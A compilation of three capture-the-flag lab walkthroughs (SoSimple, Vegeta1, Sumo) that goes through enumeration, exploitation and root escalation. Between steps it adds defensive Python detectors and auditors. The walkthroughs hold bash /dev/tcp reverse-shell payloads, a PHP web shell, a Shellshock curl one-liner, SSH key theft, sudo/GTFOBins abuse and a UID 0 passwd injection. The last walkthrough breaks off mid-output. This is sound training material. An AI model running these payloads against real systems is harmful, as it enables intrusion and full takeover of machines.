pg-sosimple-play

Exploitation Guide for SoSimple
Summary

This machine is exploited via a remote code execution vulnerability in the Social Warfare WordPress plugin. It is escalated by leaking a private SSH key of a user, followed by abusing misconfigured sudo permissions.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~# sudo nmap 192.168.120.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 22:51 EDT
Nmap scan report for 192.168.120.192
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Dirb

Using dirb, we can brute-force web directories, which reveals /wordpress:

kali@kali:~# dirb http://192.168.120.192/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 22:54:51 2020
URL_BASE: http://192.168.120.192/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.192/ ----
+ http://192.168.120.192/index.html (CODE:200|SIZE:495)
+ http://192.168.120.192/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.120.192/wordpress/
...

Web Enumeration

Our next step is to run wpscan to see if we can identify any vulnerabilities and any usernames.

kali@kali:~# wpscan --url http://192.168.120.192/wordpress/ --enumerate p
_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.120.192/wordpress/ [192.168.120.192]
[+] Started: Fri Aug 21 23:27:01 2020

Interesting Finding(s):

...

[+] social-warfare
| Location: http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2020-08-18T17:05:00.000Z
| [!] The version is out of date, the latest version is 4.1.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.120.192/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.120.192/wordpress/wp-content/plugins/social-warfare/readme.txt

We can see that wpscan identified the social-warfare plugin, with version 3.5.0 detected.
Exploitation
Social Warfare Remote Code Execution

Searching for Social Warfare on Exploit Database, we find this entry detailing a Remote File Inclusion vulnerability in the plugin.

To exploit the plugin, we will first create the following PHP web shell and save it as payload.txt:

<pre>system($_REQUEST['cmd'])</pre>

Next, we need to host this file over HTTP as follows.

kali@kali:~# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

We can now download and run the exploit, appending &cmd=id to run our command.

kali@kali:~# python exploit.py -t http://192.168.120.192/wordpress/ --payload-uri http://kali/payload.txt\&cmd\=id
[>] Sending Payload to System!
[*] Received Response From Server!
[<] Received:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ cat payload.txt
<pre>system("bash -c 'bash -i >& /dev/tcp/192.168.49.207/8080 0>&1'")</pre>

┌──(kali㉿puckie)-[~/offsec/sosimple]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.207.78 - - [23/Sep/2021 10:25:49] "GET /payload.txt?swp_debug=get_user_options HTTP/1.0" 200 -

Then, logged in to WordPress as max, we visit http://192.168.207.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt

and use a Netcat handler to catch the shell.

┌──(kali㉿puckie)-[~/offsec]
└─$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.78] 53318
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$
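On the defender's side, both requests above leave a clear trace in the web server's access log: a hit on wp-admin/admin-post.php with swp_debug=load_options and an swp_url pointing at a host that is not the site itself. The Python below is an added example (not part of the original write-up, and not the plugin's code) that parses combined-format log lines and flags that pattern. The log lines and the SERVER_HOSTS set are constructed; the first line mirrors the request used above.

```python
"""Spot Social Warfare swp_url remote-include attempts in a web server's access log.

Added example for this write-up; it is not OffSec's or the plugin's code. The log
lines and the set of hostnames the site legitimately serves are constructed.
"""
import re
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" format; only the client IP, timestamp and request line matter.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Hostnames/IPs under which this WordPress site is served (constructed).
SERVER_HOSTS = {"192.168.207.78", "so-simple.local"}

# Constructed sample log. Line 1 mirrors the request used in the write-up;
# line 3 passes an swp_url that points back at the site itself (benign here).
SAMPLE_LOG = """\
192.168.49.207 - - [23/Sep/2021:10:25:49 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.207/payload.txt HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.5 - - [23/Sep/2021:10:26:01 -0400] "GET /wordpress/ HTTP/1.1" 200 4812 "-" "Mozilla/5.0"
10.0.0.6 - - [23/Sep/2021:10:26:07 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.207.78/wp-content/uploads/options.txt HTTP/1.1" 200 - "-" "curl/7.74.0"
"""


def analyse_request(target, server_hosts):
    """Return a reason string if the request target asks Social Warfare's debug
    handler to load options from a host other than the site itself, else None."""
    url = urlparse(target)
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return None
    qs = parse_qs(url.query)          # decodes percent-encoding for us
    if qs.get("swp_debug", [""])[0] != "load_options":
        return None
    remote = urlparse(qs.get("swp_url", [""])[0])
    if remote.scheme in ("http", "https") and remote.hostname \
            and remote.hostname not in server_hosts:
        return "swp_debug=load_options fetching remote swp_url from %s" % remote.hostname
    return None


def scan_log(text, server_hosts):
    """Return (client_ip, timestamp, reason) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = analyse_request(m.group("target"), server_hosts)
        if reason:
            hits.append((m.group("ip"), m.group("ts"), reason))
    return hits


if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG, SERVER_HOSTS):
        print(f"{ts} {ip}: {reason}")
```

The matching network-side signal is the line the Python web server printed at 10:25:49: the WordPress host itself fetched /payload.txt from an address it had never spoken to. A web server making outbound HTTP requests to new external hosts is worth an alert whatever plugin is involved; updating Social Warfare past the 3.5.0 release running here is the actual fix.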

Escalation
Weak File Permissions

We’ll start our enumeration by investigating what files max has in his home folder.

www-data@so-simple:/home/max$ ls -la
ls -la
total 52
drwxr-xr-x 7 max max 4096 Aug 22 2020 .
drwxr-xr-x 4 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 max max 9 Aug 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3810 Jul 12 2020 .bashrc
drwx------ 2 max max 4096 Jul 12 2020 .cache
drwx------ 3 max max 4096 Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4096 Jul 12 2020 .local
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4096 Jul 14 2020 .ssh
-rw-r--r-- 1 max max 33 Sep 23 14:04 local.txt
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4096 Jul 12 2020 this
-rwxr-x--- 1 max max 43 Aug 22 2020 user.txt
www-data@so-simple:/home/max$

The .bash_history symlink to /dev/null is a dead end, but the .ssh directory is world-readable and the private key inside it looks legitimate, so we’ll copy it to our Kali machine.

www-data@so-simple:/home/max$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
www-data@so-simple:/home/max$

We can then log in as max using the private key.

kali@kali:~# ssh -i id_rsa max@192.168.120.192
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
...
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$

Sudo Abuse

To get root access we’ll first see if max has access to run anything with sudo.

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service

It looks like we can run /usr/sbin/service as steven without needing a password. Following the entry for service on GTFOBins, we can exploit this to get a shell as steven:

max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

Continuing down this path we’ll check if steven can run anything with sudo as well.

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh

It appears we can run the script /opt/tools/server-health.sh as root without a password. If we try to access this file, we find that it doesn’t exist:

steven@so-simple:/$ ls -lah /opt/tools/server-health.sh
ls: cannot access '/opt/tools/server-health.sh': No such file or directory
steven@so-simple:/$ ls -lah /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -lah /opt
total 8.0K
drwxr-xr-x 2 steven steven 4.0K Jul 13 21:06 .
drwxr-xr-x 20 root root 4.0K Aug 14 10:57 ..

Fortunately, /opt is owned by steven, so we can simply create the missing directory and script and then execute it as root:

steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ echo "/bin/bash" > /opt/tools/server-health.sh
steven@so-simple:/$ chmod +x /opt/tools/server-health.sh
steven@so-simple:/$ sudo /opt/tools/server-health.sh
root@so-simple:/# id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/#

Explained

root@so-simple:/home/max# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
#%sudo ALL=(ALL:ALL) ALL
max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
root@so-simple:/home/max#
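Reading the two custom lines in this sudoers file, both misconfigurations are visible without running anything: a NOPASSWD rule for a binary GTFOBins lists as a shell escape, and a rule whose target does not exist and sits under a directory the same user owns. The Python below is an added example (not OffSec's or the box's code) that automates that audit. SUDOERS is the file shown above; FS is a constructed snapshot of the relevant paths and owners taken from the ls output earlier in the guide; SHELL_ESCAPES holds the one binary this guide demonstrates.

```python
"""Audit sudoers rules: flag commands a user may run as someone else whose target
path is missing, lives under a directory that user controls, or is a known shell
escape. Added example for this write-up, not OffSec's code.

SUDOERS is the file shown in the guide; FS is a constructed snapshot of the box.
"""
import re
from dataclasses import dataclass

SUDOERS = """\
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
#%sudo ALL=(ALL:ALL) ALL
max ALL=(steven) NOPASSWD: /usr/sbin/service
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh
#includedir /etc/sudoers.d
"""

# Constructed snapshot: path -> (owner, mode). /opt/tools and the script do not exist.
FS = {
    "/": ("root", 0o755),
    "/usr": ("root", 0o755),
    "/usr/sbin": ("root", 0o755),
    "/usr/sbin/service": ("root", 0o755),
    "/opt": ("steven", 0o755),
}

# Binaries the write-up itself shows escaping to a shell (GTFOBins "service" entry).
SHELL_ESCAPES = {"/usr/sbin/service"}

# user  host=(runas) [TAG: ...] cmd[, cmd ...]
RULE_RE = re.compile(
    r"^(?P<user>[%+\w]+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    reason: str


def parse_sudoers(text):
    """Yield (user, runas, tags, command) for each user-specification rule."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(","):
            yield m.group("user"), m.group("runas"), tags, cmd.strip()


def controlled_ancestor(path, user, fs):
    """Walk from `path` up to '/', returning (node, why) for the first existing
    component that `user` owns or that is world-writable; None if there is none."""
    node = path
    while True:
        meta = fs.get(node)
        if meta is not None:
            owner, mode = meta
            if owner == user:
                return node, "owned by " + user
            if mode & 0o002:
                return node, "world-writable"
        if node == "/":
            return None
        node = node.rsplit("/", 1)[0] or "/"


def audit(text, fs):
    findings = []
    for user, runas, tags, cmd in parse_sudoers(text):
        if not cmd.startswith("/"):       # ALL or an alias: nothing to check on disk
            continue
        path = cmd.split()[0]
        if path not in fs:
            findings.append(Finding(user, runas, cmd,
                "target does not exist; whoever can create it runs code as " + runas))
        hit = controlled_ancestor(path, user, fs)
        if hit:
            findings.append(Finding(user, runas, cmd, "%s is %s" % hit))
        if path in SHELL_ESCAPES:
            findings.append(Finding(user, runas, cmd,
                "known shell escape (GTFOBins); effectively a shell as " + runas))
    return findings


if __name__ == "__main__":
    for f in audit(SUDOERS, FS):
        print(f"{f.user} -> ({f.runas}) {f.command}: {f.reason}")
```

On a live host the FS snapshot would come from os.stat on each path component; the point of the check is that sudo trusts the path string, so anyone who can create or replace what it points to inherits the rule's privileges.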


pg-vegeta1-play

Exploitation Guide for Vegeta1
Summary:

This machine is exploited by recovering SSH credentials, which are encoded in Morse code inside an audio file. It is escalated by abusing misconfigured file permissions on /etc/passwd.

Enumeration:

Check for open ports with Nmap:

kali@kali:~# sudo nmap 192.168.120.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 09:50 EDT
Nmap scan report for 192.168.120.161
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Just two ports are open, so let’s have a look at the website on port 80.

Let’s try searching for hidden directories:

root@kali:~/vulnhub/vegeta-1# gobuster -t 100 dir -e -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.0.18 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.18
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/19 21:13:53 Starting gobuster
===============================================================
http://192.168.0.18/login.php (Status: 200)
http://192.168.0.18/img (Status: 301)
http://192.168.0.18/image (Status: 301)
http://192.168.0.18/admin (Status: 301)
http://192.168.0.18/manual (Status: 301)
http://192.168.0.18/server-status (Status: 403)
http://192.168.0.18/bulma (Status: 301)
===============================================================
2020/07/19 21:19:10 Finished
===============================================================

We find a file and a few interesting-sounding directories; let’s have a look:

┌──(kali㉿puckie)-[~/offsec/vegata1]
└─$ wget http://192.168.159.73/bulma/hahahaha.wav 
--2021-09-23 08:23:47-- http://192.168.159.73/bulma/hahahaha.wav
Connecting to 192.168.159.73:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 236124 (231K)

Saving to: ‘hahahaha.wav’

hahahaha.wav 100%[=============================>] 230.59K 521KB/s in 0.4s

2021-09-23 08:23:48 (521 KB/s) - ‘hahahaha.wav’ saved [236124/236124]

┌──(kali㉿puckie)-[~/offsec/vegata1]

Now we have a WAV file. Playing it, we can tell it is Morse code, so we use a decoder to see what it says:

morse-code-decoder

We get a user called trunks with the password u$3r. Let’s try that SSH port we found earlier:

root@kali:~/vulnhub/vegeta-1# ssh trunks@192.168.0.18
The authenticity of host '192.168.0.18 (192.168.0.18)' can't be established.
ECDSA key fingerprint is SHA256:XL6IZaa/M6erCuxf2qEiDREMhwGWxwoGjo0XfO47bmU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.18' (ECDSA) to the list of known hosts.
trunks@192.168.0.18's password:
Permission denied, please try again.
trunks@192.168.0.18's password:
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72

At last we have found a way in. One of the first things I do is look in the user folder for clues; here we see .bash_history:

trunks@Vegeta:~$ ls -la
drwxr-xr-x 3 trunks trunks 4096 Jun 28 21:32 .
drwxr-xr-x 3 root   root   4096 Jun 28 17:37 ..
-rw------- 1 trunks trunks  382 Jun 28 21:36 .bash_history
-rw-r--r-- 1 trunks trunks  220 Jun 28 17:37 .bash_logout
-rw-r--r-- 1 trunks trunks 3526 Jun 28 17:37 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28 19:45 .local
-rw-r--r-- 1 trunks trunks  807 Jun 28 17:37 .profile

Privilege Escalation

It is always worth checking this out, so we look at the contents:

trunks@Vegeta:~$ cat .bash_history
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history
exit

We see a password being hashed with a salt, then a new user called Tom being added. It is strange that this is being done by the user. Let’s check the permissions of the passwd file:

trunks@Vegeta:~$ ls -la /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd

We have write permission as user trunks, who owns the file. Let’s look at the passwd file:

root@Vegeta:/home/trunks# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<<SNIP>>

User Tom isn’t in passwd, but we can add him by using the line from the history file:

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

Now we can switch user to Tom using the password Password@973 we found above:

trunks@Vegeta:~$ su Tom
Password: (enter Password@973)
root@Vegeta:/home/trunks# id
uid=0(root) gid=0(root) groups=0(root)
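The escalation works because of three things a routine check catches: /etc/passwd is owned by trunks rather than root, an account other than root ends up with UID 0, and that account carries its password hash in passwd itself (a 13-character DES crypt() string, the output of the perl line in the history). The Python below is an added audit example, not OffSec's code; SAMPLE_PASSWD is a constructed passwd file with the Tom line appended, and the stat values in the demo mirror the ls -la output above.

```python
"""Audit /etc/passwd content and permissions for the weaknesses this box relies on:
a non-root UID 0 account, a password hash stored in passwd instead of shadow, and
a passwd file not owned by root or writable by others.

Added example for this write-up, not OffSec's code. SAMPLE_PASSWD and the stat
values used in the demo are constructed to mirror what the write-up shows.
"""
import os
import stat
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Constructed: the box's passwd after the history-file line has been appended.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

# Values meaning "look in /etc/shadow" or "locked"; anything else is a hash or empty.
SHADOW_MARKERS = {"x", "*", "!", "!!", "!*"}


def parse_passwd(text):
    """Return (entries, problems). Malformed lines are reported, not skipped silently."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            problems.append(f"line {lineno}: malformed entry {line!r}")
            continue
        entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]),
                                   int(fields[3]), fields[4], fields[5], fields[6]))
    return entries, problems


def audit_entries(entries):
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account that is not root")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field, no password needed")
        elif e.passwd not in SHADOW_MARKERS:
            # 13 characters with no '$' prefix is the traditional DES crypt() format.
            kind = "legacy DES crypt" if len(e.passwd) == 13 and "$" not in e.passwd else "hash"
            findings.append(f"{e.name}: {kind} stored in world-readable passwd instead of shadow")
    return findings


def audit_file_mode(mode, owner_uid):
    """Check st_mode/st_uid of the passwd file: it must be root-owned and not
    writable by group or others (0644 is the norm)."""
    findings = []
    if owner_uid != 0:
        findings.append(f"passwd owned by uid {owner_uid}, not root: that user can add accounts")
    if mode & stat.S_IWGRP:
        findings.append("passwd is group-writable")
    if mode & stat.S_IWOTH:
        findings.append("passwd is world-writable")
    return findings


def audit_system(path="/etc/passwd"):
    """Run both checks against the live file."""
    st = os.stat(path)
    with open(path) as fh:
        entries, problems = parse_passwd(fh.read())
    return audit_file_mode(st.st_mode, st.st_uid) + problems + audit_entries(entries)


if __name__ == "__main__":
    # Constructed stat mirroring "-rw-r--r-- 1 trunks root": mode 0644, owner uid 1000.
    for f in audit_file_mode(0o100644, 1000):
        print(f)
    entries, problems = parse_passwd(SAMPLE_PASSWD)
    for f in problems + audit_entries(entries):
        print(f)
```

Note that the mode on this box, 0644, is the normal one; the defect is purely ownership, which is why a check that only looks at permission bits misses it.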

pg-sumo-play

Exploitation Guide for Sumo
Summary

This machine is exploited by the Shellshock vulnerability. It is escalated via the Dirty COW local root exploit.

Enumeration

Two ports are open, so we hit the web port with Nikto:

kali@kali:~/sumo$ nikto -h http://192.168.54.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.87
+ Target Hostname: 192.168.54.87
+ Target Port: 80
+ Start Time: 2021-09-20 15:23:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/sumo$

Keeping things simple, let’s just see if this is really vulnerable:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


Excellent! We execute id and get a response. Now let’s see if we can get a shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi
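Both curl probes above carry the same signature: a header value beginning with "() {", the string that bash (before the CVE-2014-6271 fixes) accepted from the environment as an exported function definition. Because mod_cgi turns every request header into an HTTP_* environment variable for the script, a detector has to look at all headers, not only User-Agent. The Python below is an added example (not OffSec's or Nikto's code) that parses raw requests and reports where the marker appears; the sample requests are constructed, the first reusing the header value from the probe above.

```python
"""Detect Shellshock probes (the CVE-2014-6271 family) in raw HTTP requests before
they reach a CGI script. Added example for this write-up, not OffSec's or Nikto's
code. The sample requests are constructed; the first reuses the header value from
the curl probe in the guide.
"""
import re

# Vulnerable bash imported any environment variable whose value began with
# "() {" as a function definition; that prefix is the signature to look for.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

SAMPLE_REQUESTS = [
    # 1: the write-up's own probe, in User-Agent
    "GET /cgi-bin/test/test.cgi HTTP/1.1\r\n"
    "Host: 192.168.86.150\r\n"
    "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id\r\n"
    "\r\n",
    # 2: ordinary request to the same CGI
    "GET /cgi-bin/test/test.cgi HTTP/1.1\r\n"
    "Host: 192.168.86.150\r\n"
    "User-Agent: curl/7.74.0\r\n"
    "Accept: */*\r\n"
    "\r\n",
    # 3: same marker in a different header; CGI exports this one as HTTP_COOKIE
    "GET /cgi-bin/test.sh HTTP/1.1\r\n"
    "Host: 192.168.86.150\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: () { :; }; /usr/bin/id\r\n"
    "\r\n",
    # 4: parentheses that are not a function definition: benign
    "GET /index.html HTTP/1.1\r\n"
    "Host: 192.168.86.150\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) () not a function\r\n"
    "\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return method, target, headers


def is_shellshock(value):
    """True if a header value starts with the bash function-definition marker."""
    return bool(SHELLSHOCK_RE.match(value))


def inspect_request(raw):
    """Return findings for one request: which header carries the marker and
    whether the target is a CGI path, where bash would actually be invoked."""
    method, target, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        if is_shellshock(value):
            where = "CGI target" if "/cgi-bin/" in target else "non-CGI target"
            findings.append(f"{method} {target}: Shellshock marker in {name} header ({where})")
    return findings


def scan(requests):
    return [f for raw in requests for f in inspect_request(raw)]


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f)
```

The lasting fix is the bash patch set; disabling mod_cgi where it is not needed removes the exposure path entirely, and the nikto finding above shows this host advertising the CVE in a response header, which is itself a tell for an unpatched system.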


With our handler set up:


Excellent! We catch our shell and clean up the environment. Now let’s see what we’re dealing with:

Compiling fails with a gcc error; we can fix that by extending PATH as follows:

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/; export PATH

Let’s also try linux-exploit-suggester:

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh
wget http://192.168.49.54/linux-exploit-suggester.sh
--2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh
Connecting to 192.168.49.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'

0K .......... .......... .......... .......... .......... 57% 227K 0s
50K .......... .......... .......... ...... 100% 2.58M=0.2s

2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891]

www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

